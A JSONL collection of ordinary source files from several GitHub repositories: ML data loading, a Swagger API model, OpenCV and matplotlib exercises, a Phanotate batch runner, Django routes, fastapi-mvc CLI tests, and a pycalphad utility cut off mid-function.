+{"seq_id":"71600804647","text":"# -*- coding:utf-8 -*-\n\nimport codecs\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\ndef get_max_length(input_file):\n left_length = []\n right_length = []\n with codecs.open(input_file, 'r', encoding='utf-8_sig') as rfile:\n for line in rfile.readlines():\n data = line.split('\\t')\n left_data = data[0].split()\n left_length.append(len(left_data))\n right_data = data[1].split()\n right_length.append(len(right_data))\n return max(max(left_length), max(right_length))\n\n\ndef get_vocab(input_file):\n vocab = set('pad')\n with codecs.open(input_file, 'r', encoding='utf-8_sig') as rfile:\n for line in rfile.readlines():\n data = line.split('\\t')\n for char in data[0].split():\n vocab.add(char)\n for char in data[1].split():\n vocab.add(char)\n vocab = {word:(i+1) for i, word in enumerate(vocab)}\n vocab['pad'] = 0\n return vocab\n\ndef padding_sentence(data, max_length, vocab):\n sentence = [vocab[word] for word in data.split()]\n if len(sentence) < max_length:\n sentence = sentence + [vocab['pad']]*(max_length-len(sentence))\n elif len(sentence) > max_length:\n sentence = sentence[:max_length]\n return sentence\n\ndef load_data(input_file):\n max_length = get_max_length(input_file)\n vocab = get_vocab(input_file)\n left_data = []\n right_data = []\n label = []\n with codecs.open(input_file, 'r', encoding='utf_8_sig') as rfile:\n for line in rfile.readlines():\n data = line.strip().split('\\t')\n\n left_data.append(padding_sentence(data[0], max_length, vocab))\n right_data.append(padding_sentence(data[1], max_length, vocab))\n if int(data[2]) == 0: label.append([1, 0])\n else: label.append([0, 1])\n x_left_data = np.array(left_data)\n x_right_data = np.array(right_data)\n y_label = np.array(label)\n return x_left_data, x_right_data, y_label, vocab, max_length\n\nif __name__ == '__main__':\n # x_left_data, x_right_data, y_label, vocab, max_length = load_data('data/atec_train_data.txt')\n # print(x_left_data[0])\n # print(y_label[0])\n import tensorflow as tf\n dbpedia = tf.contrib.learn.datasets.load_dataset('dbpedia')\n\n\n\n","repo_name":"zhongbin1/DeepMatching","sub_path":"data_helps.py","file_name":"data_helps.py","file_ext":"py","file_size_in_byte":2296,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"53"}
+{"seq_id":"34423576195","text":"# coding: utf-8\r\n\r\n\"\"\"\r\n Trend Micro Deep Security API\r\n\r\n Copyright 2018 - 2020 Trend Micro Incorporated. Get protected, stay secured, and keep informed with Trend Micro Deep Security's new RESTful API. Access system data and manage security configurations to automate your security workflows and integrate Deep Security into your CI/CD pipeline. # noqa: E501\r\n\r\n OpenAPI spec version: 20.0.186\r\n \r\n Generated by: https://github.com/swagger-api/swagger-codegen.git\r\n\"\"\"\r\n\r\n\r\nimport pprint\r\nimport re # noqa: F401\r\n\r\nimport six\r\n\r\nfrom deepsecurity.models.account_rights import AccountRights # noqa: F401,E501\r\nfrom deepsecurity.models.fix_rights import FixRights # noqa: F401,E501\r\nfrom deepsecurity.models.heap_rights import HeapRights # noqa: F401,E501\r\nfrom deepsecurity.models.license_rate_rights import LicenseRateRights # noqa: F401,E501\r\nfrom deepsecurity.models.network_security_rights import NetworkSecurityRights # noqa: F401,E501\r\nfrom deepsecurity.models.query_rights import QueryRights # noqa: F401,E501\r\nfrom deepsecurity.models.query_traceback_rights import QueryTracebackRights # noqa: F401,E501\r\nfrom deepsecurity.models.server_log_rights import ServerLogRights # noqa: F401,E501\r\nfrom deepsecurity.models.stack_trace_rights import StackTraceRights # noqa: F401,E501\r\n\r\n\r\nclass HostedServiceRights(object):\r\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\r\n\r\n Do not edit the class manually.\r\n \"\"\"\r\n\r\n \"\"\"\r\n Attributes:\r\n swagger_types (dict): The key is attribute name\r\n and the value is attribute type.\r\n attribute_map (dict): The key is attribute name\r\n and the value is json key in definition.\r\n \"\"\"\r\n swagger_types = {\r\n 'account_rights': 'AccountRights',\r\n 'fix_rights': 'FixRights',\r\n 'heap_rights': 'HeapRights',\r\n 'license_rate_rights': 'LicenseRateRights',\r\n 'query_rights': 'QueryRights',\r\n 'query_traceback_rights': 'QueryTracebackRights',\r\n 'server_log_rights': 'ServerLogRights',\r\n 'stack_trace_rights': 'StackTraceRights',\r\n 'network_security_rights': 'NetworkSecurityRights'\r\n }\r\n\r\n attribute_map = {\r\n 'account_rights': 'accountRights',\r\n 'fix_rights': 'fixRights',\r\n 'heap_rights': 'heapRights',\r\n 'license_rate_rights': 'licenseRateRights',\r\n 'query_rights': 'queryRights',\r\n 'query_traceback_rights': 'queryTracebackRights',\r\n 'server_log_rights': 'serverLogRights',\r\n 'stack_trace_rights': 'stackTraceRights',\r\n 'network_security_rights': 'networkSecurityRights'\r\n }\r\n\r\n def __init__(self, account_rights=None, fix_rights=None, heap_rights=None, license_rate_rights=None, query_rights=None, query_traceback_rights=None, server_log_rights=None, stack_trace_rights=None, network_security_rights=None): # noqa: E501\r\n \"\"\"HostedServiceRights - a model defined in Swagger\"\"\" # noqa: E501\r\n\r\n self._account_rights = None\r\n self._fix_rights = None\r\n self._heap_rights = None\r\n self._license_rate_rights = None\r\n self._query_rights = None\r\n self._query_traceback_rights = None\r\n self._server_log_rights = None\r\n self._stack_trace_rights = None\r\n self._network_security_rights = None\r\n self.discriminator = None\r\n\r\n if account_rights is not None:\r\n self.account_rights = account_rights\r\n if fix_rights is not None:\r\n self.fix_rights = fix_rights\r\n if heap_rights is not None:\r\n self.heap_rights = heap_rights\r\n if license_rate_rights is not None:\r\n 
self.license_rate_rights = license_rate_rights\r\n if query_rights is not None:\r\n self.query_rights = query_rights\r\n if query_traceback_rights is not None:\r\n self.query_traceback_rights = query_traceback_rights\r\n if server_log_rights is not None:\r\n self.server_log_rights = server_log_rights\r\n if stack_trace_rights is not None:\r\n self.stack_trace_rights = stack_trace_rights\r\n if network_security_rights is not None:\r\n self.network_security_rights = network_security_rights\r\n\r\n @property\r\n def account_rights(self):\r\n \"\"\"Gets the account_rights of this HostedServiceRights. # noqa: E501\r\n\r\n Rights related to accounts. # noqa: E501\r\n\r\n :return: The account_rights of this HostedServiceRights. # noqa: E501\r\n :rtype: AccountRights\r\n \"\"\"\r\n return self._account_rights\r\n\r\n @account_rights.setter\r\n def account_rights(self, account_rights):\r\n \"\"\"Sets the account_rights of this HostedServiceRights.\r\n\r\n Rights related to accounts. # noqa: E501\r\n\r\n :param account_rights: The account_rights of this HostedServiceRights. # noqa: E501\r\n :type: AccountRights\r\n \"\"\"\r\n\r\n self._account_rights = account_rights\r\n\r\n @property\r\n def fix_rights(self):\r\n \"\"\"Gets the fix_rights of this HostedServiceRights. # noqa: E501\r\n\r\n Rights related to fixes. # noqa: E501\r\n\r\n :return: The fix_rights of this HostedServiceRights. # noqa: E501\r\n :rtype: FixRights\r\n \"\"\"\r\n return self._fix_rights\r\n\r\n @fix_rights.setter\r\n def fix_rights(self, fix_rights):\r\n \"\"\"Sets the fix_rights of this HostedServiceRights.\r\n\r\n Rights related to fixes. # noqa: E501\r\n\r\n :param fix_rights: The fix_rights of this HostedServiceRights. # noqa: E501\r\n :type: FixRights\r\n \"\"\"\r\n\r\n self._fix_rights = fix_rights\r\n\r\n @property\r\n def heap_rights(self):\r\n \"\"\"Gets the heap_rights of this HostedServiceRights. # noqa: E501\r\n\r\n Rights related to the heap. # noqa: E501\r\n\r\n :return: The heap_rights of this HostedServiceRights. # noqa: E501\r\n :rtype: HeapRights\r\n \"\"\"\r\n return self._heap_rights\r\n\r\n @heap_rights.setter\r\n def heap_rights(self, heap_rights):\r\n \"\"\"Sets the heap_rights of this HostedServiceRights.\r\n\r\n Rights related to the heap. # noqa: E501\r\n\r\n :param heap_rights: The heap_rights of this HostedServiceRights. # noqa: E501\r\n :type: HeapRights\r\n \"\"\"\r\n\r\n self._heap_rights = heap_rights\r\n\r\n @property\r\n def license_rate_rights(self):\r\n \"\"\"Gets the license_rate_rights of this HostedServiceRights. # noqa: E501\r\n\r\n Rights related to license rates. # noqa: E501\r\n\r\n :return: The license_rate_rights of this HostedServiceRights. # noqa: E501\r\n :rtype: LicenseRateRights\r\n \"\"\"\r\n return self._license_rate_rights\r\n\r\n @license_rate_rights.setter\r\n def license_rate_rights(self, license_rate_rights):\r\n \"\"\"Sets the license_rate_rights of this HostedServiceRights.\r\n\r\n Rights related to license rates. # noqa: E501\r\n\r\n :param license_rate_rights: The license_rate_rights of this HostedServiceRights. # noqa: E501\r\n :type: LicenseRateRights\r\n \"\"\"\r\n\r\n self._license_rate_rights = license_rate_rights\r\n\r\n @property\r\n def query_rights(self):\r\n \"\"\"Gets the query_rights of this HostedServiceRights. # noqa: E501\r\n\r\n Rights related to queries. # noqa: E501\r\n\r\n :return: The query_rights of this HostedServiceRights. 
# noqa: E501\r\n :rtype: QueryRights\r\n \"\"\"\r\n return self._query_rights\r\n\r\n @query_rights.setter\r\n def query_rights(self, query_rights):\r\n \"\"\"Sets the query_rights of this HostedServiceRights.\r\n\r\n Rights related to queries. # noqa: E501\r\n\r\n :param query_rights: The query_rights of this HostedServiceRights. # noqa: E501\r\n :type: QueryRights\r\n \"\"\"\r\n\r\n self._query_rights = query_rights\r\n\r\n @property\r\n def query_traceback_rights(self):\r\n \"\"\"Gets the query_traceback_rights of this HostedServiceRights. # noqa: E501\r\n\r\n Rights related to query traceback. # noqa: E501\r\n\r\n :return: The query_traceback_rights of this HostedServiceRights. # noqa: E501\r\n :rtype: QueryTracebackRights\r\n \"\"\"\r\n return self._query_traceback_rights\r\n\r\n @query_traceback_rights.setter\r\n def query_traceback_rights(self, query_traceback_rights):\r\n \"\"\"Sets the query_traceback_rights of this HostedServiceRights.\r\n\r\n Rights related to query traceback. # noqa: E501\r\n\r\n :param query_traceback_rights: The query_traceback_rights of this HostedServiceRights. # noqa: E501\r\n :type: QueryTracebackRights\r\n \"\"\"\r\n\r\n self._query_traceback_rights = query_traceback_rights\r\n\r\n @property\r\n def server_log_rights(self):\r\n \"\"\"Gets the server_log_rights of this HostedServiceRights. # noqa: E501\r\n\r\n Rights related to server logs. # noqa: E501\r\n\r\n :return: The server_log_rights of this HostedServiceRights. # noqa: E501\r\n :rtype: ServerLogRights\r\n \"\"\"\r\n return self._server_log_rights\r\n\r\n @server_log_rights.setter\r\n def server_log_rights(self, server_log_rights):\r\n \"\"\"Sets the server_log_rights of this HostedServiceRights.\r\n\r\n Rights related to server logs. # noqa: E501\r\n\r\n :param server_log_rights: The server_log_rights of this HostedServiceRights. # noqa: E501\r\n :type: ServerLogRights\r\n \"\"\"\r\n\r\n self._server_log_rights = server_log_rights\r\n\r\n @property\r\n def stack_trace_rights(self):\r\n \"\"\"Gets the stack_trace_rights of this HostedServiceRights. # noqa: E501\r\n\r\n Rights related to stack traces. # noqa: E501\r\n\r\n :return: The stack_trace_rights of this HostedServiceRights. # noqa: E501\r\n :rtype: StackTraceRights\r\n \"\"\"\r\n return self._stack_trace_rights\r\n\r\n @stack_trace_rights.setter\r\n def stack_trace_rights(self, stack_trace_rights):\r\n \"\"\"Sets the stack_trace_rights of this HostedServiceRights.\r\n\r\n Rights related to stack traces. # noqa: E501\r\n\r\n :param stack_trace_rights: The stack_trace_rights of this HostedServiceRights. # noqa: E501\r\n :type: StackTraceRights\r\n \"\"\"\r\n\r\n self._stack_trace_rights = stack_trace_rights\r\n\r\n @property\r\n def network_security_rights(self):\r\n \"\"\"Gets the network_security_rights of this HostedServiceRights. # noqa: E501\r\n\r\n Rights related to Network Security. # noqa: E501\r\n\r\n :return: The network_security_rights of this HostedServiceRights. # noqa: E501\r\n :rtype: NetworkSecurityRights\r\n \"\"\"\r\n return self._network_security_rights\r\n\r\n @network_security_rights.setter\r\n def network_security_rights(self, network_security_rights):\r\n \"\"\"Sets the network_security_rights of this HostedServiceRights.\r\n\r\n Rights related to Network Security. # noqa: E501\r\n\r\n :param network_security_rights: The network_security_rights of this HostedServiceRights. 
# noqa: E501\r\n :type: NetworkSecurityRights\r\n \"\"\"\r\n\r\n self._network_security_rights = network_security_rights\r\n\r\n def to_dict(self):\r\n \"\"\"Returns the model properties as a dict\"\"\"\r\n result = {}\r\n\r\n for attr, _ in six.iteritems(self.swagger_types):\r\n value = getattr(self, attr)\r\n if isinstance(value, list):\r\n result[attr] = list(map(\r\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\r\n value\r\n ))\r\n elif hasattr(value, \"to_dict\"):\r\n result[attr] = value.to_dict()\r\n elif isinstance(value, dict):\r\n result[attr] = dict(map(\r\n lambda item: (item[0], item[1].to_dict())\r\n if hasattr(item[1], \"to_dict\") else item,\r\n value.items()\r\n ))\r\n else:\r\n result[attr] = value\r\n if issubclass(HostedServiceRights, dict):\r\n for key, value in self.items():\r\n result[key] = value\r\n\r\n return result\r\n\r\n def to_str(self):\r\n \"\"\"Returns the string representation of the model\"\"\"\r\n return pprint.pformat(self.to_dict())\r\n\r\n def __repr__(self):\r\n \"\"\"For `print` and `pprint`\"\"\"\r\n return self.to_str()\r\n\r\n def __eq__(self, other):\r\n \"\"\"Returns true if both objects are equal\"\"\"\r\n if not isinstance(other, HostedServiceRights):\r\n return False\r\n\r\n return self.__dict__ == other.__dict__\r\n\r\n def __ne__(self, other):\r\n \"\"\"Returns true if both objects are not equal\"\"\"\r\n return not self == other\r\n\r\n","repo_name":"DeepSecurityHealthCheck/HealthCheckCore","sub_path":"vendor/SDK/deepsecurity/models/hosted_service_rights.py","file_name":"hosted_service_rights.py","file_ext":"py","file_size_in_byte":12685,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"53"}
+{"seq_id":"17653042890","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import, unicode_literals\n\nfrom collections import namedtuple\n\n\nPolymorphicClassInfo = namedtuple('PolymorphicClassInfo', [\n 'model',\n 'fields',\n])\n\n\ndef get_subclasses(cls):\n \"\"\"\n Recursively creates a list of all subclasses of the provided class.\n \"\"\"\n return cls.__subclasses__() + [sub\n for direct in cls.__subclasses__()\n for sub in get_subclasses(direct)]\n\n\ndef get_polymorphic_field_mapping(cls):\n \"\"\"\n Creates several helper attributes on the serializer and builds a\n mapping of subclasses to the fields included on each.\n \"\"\"\n return {\n subclass.__name__: PolymorphicClassInfo(\n model=subclass,\n fields=[field for field in subclass._meta.local_fields\n if field.serialize and not field.rel])\n for subclass in get_subclasses(cls) + [cls]\n }\n","repo_name":"emergence-lab/emergence-lab","sub_path":"core/polymorphic.py","file_name":"polymorphic.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
+{"seq_id":"10859765347","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n# give us 100 2d values centered at 0\n# X = np.random.randn(100, 2)\n#\n# plt.scatter(X[:,0], X[:,1])\n# plt.show()\n\nX = np.random.randn(200, 2)\n# create clusters of data\n# select all the rows from index 0 to index 50 and add a 3 to all elements\nX[:50] += 3\n\n# this is a 1d array that colors the particular clusters\nY = np.zeros(200)\nY[:50] = 1\n\nplt.scatter(X[:,0], X[:,1], c=Y)\nplt.show()","repo_name":"PikePullen/matplotlib2","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"33333787367","text":"import cv2 as cv\nimport numpy as np\n\nimg1 = cv.imread(\"imagenes/img1.jpg\")\nimg2 = cv.imread(\"imagenes/img2.png\")\ncv.imwrite(\"Resultados/Original_Universe.png\", img1)\ncv.imwrite(\"Resultados/Original_Thanos.png\", img2)\n\n\n#####################################################################\ndef rescale(image, scale=0.5):\n width = int(image.shape[1]*scale)\n height = int(image.shape[0]*scale)\n dimensions = (width, height)\n\n return cv.resize(image, dimensions, interpolation=cv.INTER_AREA)\n\nimg1_rescale = rescale(img1)\nimg2_rescale = rescale(img2)\ncv.imwrite(\"Resultados/Rescaled_Universe.png\",img1_rescale)\ncv.imwrite(\"Resultados/Rescaled_Thanos.png\",img2_rescale)\n\n####################################################################\n\ndef draws1 (image1):\n \n cv.rectangle(image1, (500, 100), (50, 20), (43, 54, 165), thickness=2)\n cv.circle(image1, (530, 60), 50, (255, 64, 255), thickness=-1)\n cv.circle(image1, (500, 200), 80, (112, 10, 30), thickness=2)\n cv.circle(image1, (100, 200), 100, (64, 87, 130), thickness=-1)\n cv.line(image1,(200,0),(600,200),(0,255,0),thickness=10)\n cv.putText(image1, \"This is magnificent\", (100, 200), cv.FONT_HERSHEY_TRIPLEX, 1, (255, 255, 255), 2)\n \n return(image1)\n\ndef draws2(image2):\n cv.rectangle(image2, (500, 540), (200, 400), (43, 54, 165), thickness=cv.FILLED)\n cv.circle(image2, (530, 60), 50, (120, 280, 30), thickness=-1)\n cv.circle(image2, (310, 110), 100, (12, 210, 30), thickness=2)\n cv.circle(image2, (100, 200), 100, (120, 80, 130), thickness=-1)\n cv.line(image2,(600,0),(0,600),(255,255,0),thickness=10)\n cv.putText(image2, \"I AM INEVIBALE\", (230, 480), cv.FONT_HERSHEY_DUPLEX, 1, (255, 255, 255), 2)\n\n \n return(image2)\n\ndraw11 = draws1(img1)\ndraw12 = draws2(img2)\ncv.imwrite(\"Resultados/Draw_Universe.png\", draw11 )\ncv.imwrite(\"Resultados/Draw_Thanos.png\", draw12)\n\n\n####################################################################\ndef ColorScale(image):\n con = cv.cvtColor(image, cv.COLOR_BGR2RGB)\n return(con) \n\ndef grayScale(image):\n con = cv.cvtColor(image, cv.COLOR_BGR2GRAY)\n return(con)\n\ncon_uni = ColorScale(img1)\ncon_tha = ColorScale(img2)\ngray_uni = grayScale(img1)\ngray_tha = grayScale(img2)\n\ncv.imwrite(\"Resultados/Inverted_Universe.png\", con_uni)\ncv.imwrite(\"Resultados/Iverted_Thanos.png\", con_tha)\ncv.imwrite(\"Resultados/Gray_Universe.png\", gray_uni)\ncv.imwrite(\"Resultados/Gray_Thanos.png\", gray_tha)\n######################################################################\n\n#recro = cv.rectangle(img1, (575, 320), (477, 220), (0,0,255), thickness=2)\ndef croped1():\n UniCro = img1[220:320, 477:575]\n return(UniCro)\n\n#recro = cv.rectangle(img2, (230, 10), (400, 225), (0, 0, 255), thickness=2)\ndef croped2():\n ThaCro = img2[10:225, 230:400]\n return(ThaCro)\n\nCropUni =croped1() \nCropTha =croped2()\n\ncv.imwrite(\"Resultados/Croped_Star.png\", CropUni)\ncv.imwrite(\"Resultados/Croped_Thanos.png\", CropTha)\n######################################################################\ndef th(img):\n ret, thresh = cv.threshold(img, 110, 255, cv.THRESH_BINARY)\n return(thresh)\n\nthresh_uni= th(gray_uni)\nthresh_tha = th(gray_tha)\n\ncv.imwrite(\"Resultados/Thresh_Thanos.png\", thresh_tha)\ncv.imwrite(\"Resultados/Thresh_Universe.png\", thresh_uni)\n\n#######################################################################\ndef mask(image):\n blank = np.zeros(image.shape[:2], dtype = \"uint8\")\n circle = cv.circle(blank, 
(image.shape[1]//2,image.shape[0]//2),100,255, -1)\n masked = cv.bitwise_and(image,image,mask=circle)\n return(masked)\n\nmasked_uni = mask(img1)\nmasked_Thanos = mask(img2)\ncv.imwrite(\"Resultados/Masked_Uni.png\", masked_uni)\ncv.imwrite(\"Resultados/Masked_Thanos.png\", masked_Thanos)\n\n########################################################################\n\n\n","repo_name":"NestorMartinez13/Taller_3_Python_UPB_2022_1003043733","sub_path":"transformations.py","file_name":"transformations.py","file_ext":"py","file_size_in_byte":3828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"6263588374","text":"#!/usr/bin/env python3\n\"\"\"\nPhanotate runner.\nUsage:\n phanotate_runner.py ( --input_file_list=PATH ) ( --output_dir=PATH )\n ( --out_format=FORMAT ) ( --threads=INT )\n\nOptions:\n -h --help Show this screen.\n -i --input_file_list=PATH Path to a file containing a list of input fasta files.\n -o --output_dir=PATH Path to the output directory.\n -f --out_format=FORMAT Format of the output files choices=['tabular','genbank','fasta'] [default: genbank]\n -t --threads=INT Number of threads to use for running individual anotations [default: 1].\n\"\"\"\nimport os\nimport sys\nimport subprocess\nimport logging\nfrom multiprocessing import Pool\nfrom functools import partial\nfrom docopt import docopt\nlogger = logging.getLogger(__name__)\n\n\ndef check_extensions(input_file):\n extensions = ('.fasta', 'fasta.gz', '.fa', '.fa.gz', '.fna', '.fna.gz')\n for ext in extensions:\n if input_file.endswith(ext):\n return ext\n raise ValueError(\"Input file does not have a valid extension: {}\\nValid extensions are: {}\".format(input_file, extensions))\n\ndef run_phanotate(input_file, output_dir, out_format, input_file_extension='', output_file_extension='',):\n \"\"\"\n Run phanotate on a single input file.\n \"\"\"\n out_fname = os.path.join(output_dir, os.path.basename(input_file).replace(input_file_extension, output_file_extension))\n try:\n cmd = [\n 'phanotate.py',\n '-o', out_fname,\n '-f', out_format,\n input_file ]\n logger.info(\"Running phanotate on {}\".format(input_file))\n logger.info(\"Running command: {}\".format(' '.join(cmd)))\n subprocess.run(cmd, check=True)\n except subprocess.CalledProcessError:\n logger.error(\"Error running phanotate on {}\".format(input_file))\n sys.exit(1)\n\ndef main(*args, **kwargs):\n logging.basicConfig(\n level = logging.INFO,\n datefmt=\"%Y-%m-%d %H:%M\",\n format=\"[%(name)s][%(asctime)s][%(levelname)s] %(message)s\",\n handlers=[\n logging.StreamHandler(),\n ]\n )\n logger.info(\"Arguments: {}\".format(kwargs))\n\n assert int(kwargs['--threads']) > 0, \"Number of threads must be greater than 0\"\n\n kwargs['--output_dir'] = os.path.abspath(kwargs['--output_dir'])\n assert os.path.isdir(kwargs['--output_dir']), \"Output directory does not exist: {}\".format(kwargs['--output_dir'])\n\n file_extensions = {'tabular': '.tsv', 'genbank': '.gbk', 'fasta': '.fna'}\n assert kwargs['--out_format'] in file_extensions.keys(), \"Output format must be one of: {}\".format(file_extensions.keys())\n\n with open(kwargs['--input_file_list'], 'r') as f:\n input_files = f.read().splitlines()\n\n for input_file in input_files:\n assert os.path.exists(input_file), \"Input file does not exist: {}\".format(input_file)\n\n logger.info(\"Running phanotate on {} files\".format(len(input_files)))\n\n logger.info(\"Starting phanotate annotations with {} threads\".format(kwargs['--threads']))\n with Pool(int(kwargs['--threads'])) as p:\n p.map(\n partial(\n run_phanotate,\n output_dir=kwargs['--output_dir'],\n out_format=kwargs['--out_format'],\n input_file_extension=check_extensions(input_files[0]),\n output_file_extension=file_extensions[kwargs['--out_format']],\n ),\n input_files)\n\n logger.info(\"FINISHED !\")\n\nif __name__ == '__main__':\n main(**docopt(__doc__))\n","repo_name":"pangenome/phage-evo-paper","sub_path":"workflow/scripts/phanotate_runner.py","file_name":"phanotate_runner.py","file_ext":"py","file_size_in_byte":3557,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
+{"seq_id":"26288370638","text":"from collections import Counter\n\nf = open(\"msgs.txt\",\"r\")\nmsgs=[]\nfor msg in f.readlines():\n\tmsgs.append(msg[-5:-1])\n\ncntrs = Counter(msgs)\nfreqs = Counter(cntrs.values())\n\nfor cntr in cntrs:\n\tprint(cntr, cntrs[cntr])\nprint(freqs, \"sum:\", sum(cntrs.values()))\n","repo_name":"amjadmajid/Backscatter-Network","sub_path":"sniffer/frame_stats.py","file_name":"frame_stats.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"40390332495","text":"from django.contrib import admin\nfrom django.urls import path,include\nfrom . import views\n\nurlpatterns = [\n path(\"\", views.index, name=\"ShopHome\"),\n path(\"contact_us/\", views.contact_us, name=\"Contact us\"),\n path(\"about_us/\", views.about_us, name=\"about_us\"),\n path(\"tracker/\", views.tracker, name=\"tracker\"),\n path(\"prod_view/\", views.prod_view, name=\"prod_view\"),\n path(\"search/\", views.search, name=\"search\"),\n path(\"checkout/\", views.checkout, name=\"checkout\"),\n path(\"handlerequest/\", views.handlerequest, name=\"HandleRequest\"),\n]\n","repo_name":"Fahad-CSE16/EcommerseWeb","sub_path":"shop/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"37183128943","text":"import copy\nfrom unittest import mock\n\nimport pytest\nfrom copier.errors import UserMessageError\nfrom fastapi_mvc.cli.update import update\nfrom fastapi_mvc.constants import ANSWERS_FILE, COPIER_PROJECT\n\n\nclass TestCliUpdateCommand:\n\n @pytest.fixture\n def patched_update(self):\n cmd = copy.deepcopy(update)\n copier_patch = mock.patch(\n \"fastapi_mvc.cli.update.copier\",\n )\n cmd.copier = copier_patch.start()\n yield cmd\n copier_patch.stop()\n del cmd\n\n def test_should_exit_zero_when_invoked_with_help(self, monkeypatch, fake_project, cli_runner):\n # given / when\n monkeypatch.chdir(fake_project[\"root\"])\n result = cli_runner.invoke(update, [\"--help\"])\n\n # then\n assert result.exit_code == 0\n\n def test_should_exit_error_when_invoked_with_invalid_option(self, cli_runner):\n # given / when\n result = cli_runner.invoke(update, [\"--not_exists\"])\n\n # then\n assert result.exit_code == 2\n\n def test_should_exit_zero_and_call_copier_with_defaults(self, patched_update, monkeypatch, fake_project, cli_runner):\n # given / when\n monkeypatch.chdir(fake_project[\"root\"])\n result = cli_runner.invoke(patched_update, [])\n\n # then\n assert result.exit_code == 0\n patched_update.copier.run_update.assert_called_once_with(\n vcs_ref=COPIER_PROJECT.vcs_ref,\n answers_file=ANSWERS_FILE,\n user_defaults={\n \"_commit\": \"efb938e\",\n \"_src_path\": \"https://github.com/fastapi-mvc/copier-project.git\",\n \"aiohttp\": True,\n \"author\": \"Radosław Szamszur\",\n \"chart_name\": \"fake-project\",\n \"container_image_name\": \"fake-project\",\n \"copyright_date\": \"2022\",\n \"email\": \"github@rsd.sh\",\n \"fastapi_mvc_version\": \"0.17.0\",\n \"github_actions\": True,\n \"helm\": True,\n \"license\": \"MIT\",\n \"nix\": True,\n \"package_name\": \"fake_project\",\n \"project_description\": \"This project was generated with fastapi-mvc.\",\n \"project_name\": \"fake-project\",\n \"redis\": True,\n \"repo_url\": \"https://your.repo.url.here\",\n \"script_name\": \"fake-project\",\n \"version\": \"0.1.0\",\n },\n pretend=False\n )\n\n def test_should_exit_zero_and_call_copier_with_parsed_arguments(self, patched_update, monkeypatch, fake_project, cli_runner):\n # given / when\n monkeypatch.chdir(fake_project[\"root\"])\n result = cli_runner.invoke(\n patched_update, [\n \"--no-interaction\",\n \"--pretend\",\n \"--use-version\",\n \"master\",\n ],\n )\n\n # then\n assert result.exit_code == 0\n patched_update.copier.run_update.assert_called_once_with(\n vcs_ref=\"master\",\n answers_file=ANSWERS_FILE,\n data={\n \"_commit\": \"efb938e\",\n \"_src_path\": \"https://github.com/fastapi-mvc/copier-project.git\",\n \"aiohttp\": True,\n \"author\": \"Radosław Szamszur\",\n \"chart_name\": \"fake-project\",\n \"container_image_name\": \"fake-project\",\n \"copyright_date\": \"2022\",\n \"email\": \"github@rsd.sh\",\n \"fastapi_mvc_version\": \"0.17.0\",\n \"github_actions\": True,\n \"helm\": True,\n \"license\": \"MIT\",\n \"nix\": True,\n \"package_name\": \"fake_project\",\n \"project_description\": \"This project was generated with fastapi-mvc.\",\n \"project_name\": \"fake-project\",\n \"redis\": True,\n \"repo_url\": \"https://your.repo.url.here\",\n \"script_name\": \"fake-project\",\n \"version\": \"0.1.0\",\n },\n overwrite=True,\n pretend=True,\n )\n\n def test_should_exit_error_when_not_in_fastapi_mvc_project(self, cli_runner, caplog):\n # given / when\n result = cli_runner.invoke(update, [])\n\n # then\n assert result.exit_code == 1\n msg = \"Not 
a fastapi-mvc project. Try 'fastapi-mvc new --help' for details how to create one.\"\n assert msg in caplog.text\n\n def test_should_exit_error_on_copier_error(self, patched_update, monkeypatch, fake_project, cli_runner):\n # given / when\n patched_update.copier.run_update.side_effect = UserMessageError(\"Fake error\")\n monkeypatch.chdir(fake_project[\"root\"])\n result = cli_runner.invoke(patched_update, [])\n\n # then\n assert result.exit_code == 2\n assert \"Fake error\" in result.output\n patched_update.copier.run_update.assert_called_once()\n","repo_name":"fastapi-mvc/fastapi-mvc","sub_path":"tests/unit/cli/test_update.py","file_name":"test_update.py","file_ext":"py","file_size_in_byte":4926,"program_lang":"python","lang":"en","doc_type":"code","stars":495,"dataset":"github-code","pt":"53"}
+{"seq_id":"12352042811","text":"\"\"\"\nUtilities for distinguishing and renaming ordered and disordered configurations of\nmulti-sublattice phases.\n\n`OrderingRecord` objects are able to be used for any phase. `OrderingRecords` can be\ncreated automatically for phases modeled with a partitioned order/disorder model through\nthe `create_ordering_records` method, since the partitioned model contains all the\ninformation about the ordered and disordered phase.\n\"\"\"\n\nfrom dataclasses import dataclass\nfrom typing import Sequence, List\nimport itertools\nfrom collections import defaultdict\nimport numpy as np\nimport xarray as xr\nfrom pycalphad.core.utils import unpack_components\n\n@dataclass\nclass OrderingRecord:\n ordered_phase_name: str\n disordered_phase_name: str\n subl_dof: Sequence[int] # number of degrees of freedom in each sublattice of the ordered phase\n symmetric_subl_idx: Sequence[Sequence[int]] # List of sublattices (of the ordered phase) that are symmetric\n\n def is_disordered(self, site_fractions):\n # Short circuit if any site fraction is NaN (i.e. no phase or a different phase)\n if np.any(np.isnan(site_fractions[:sum(self.subl_dof)])):\n return False\n\n # For each sublattice, create a `slice` object for slicing the site\n # fractions of that particular sublattice from the site fraction array\n subl_slices = []\n for subl_idx in range(len(self.subl_dof)):\n start_idx = np.sum(self.subl_dof[:subl_idx], dtype=np.int_)\n end_idx = start_idx + self.subl_dof[subl_idx]\n subl_slices.append(slice(start_idx, end_idx))\n\n # For each set of symmetrically equivalent sublattices\n for symm_subl in self.symmetric_subl_idx:\n # Check whether the site fractions of each pair of symmetrically\n # equivalent sublattices are 